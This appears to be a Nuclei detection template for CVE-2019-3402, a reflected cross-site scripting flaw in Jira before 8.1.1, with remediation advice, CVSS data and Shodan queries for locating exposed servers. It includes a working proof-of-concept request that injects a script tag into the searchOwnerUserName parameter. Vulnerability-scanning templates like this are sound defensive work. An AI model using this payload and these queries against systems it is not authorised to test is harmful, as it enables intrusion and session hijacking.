id: CVE-2019-3402 info: name: Jira < 8.1.1 - Cross-Site Scripting author: pdteam severity: medium description: | Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement. remediation: | Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c - https://jira.atlassian.com/browse/JRASERVER-69243 - https://nvd.nist.gov/vuln/detail/CVE-2019-3402 - https://github.com/ARPSyndicate/cvemon - https://github.com/Faizee-Asad/JIRA-Vulnerabilities classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3402 cwe-id: CWE-79 epss-score: 0.00238 epss-percentile: 0.61128 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atlassian product: jira shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,xss http: - method: GET path: - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search" matchers-condition: and matchers: - type: word part: body words: - "'' does not exist" - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402201fdd87547b4b4f0da9b7c5d508247253c3619369479b116de338b309d92cde01022010a7c72fa7219ac5fb6603fa55ba82dfef346d1c3facac9ffd2cc273994a98cb:922c64590222798bb761d5b6d8e72950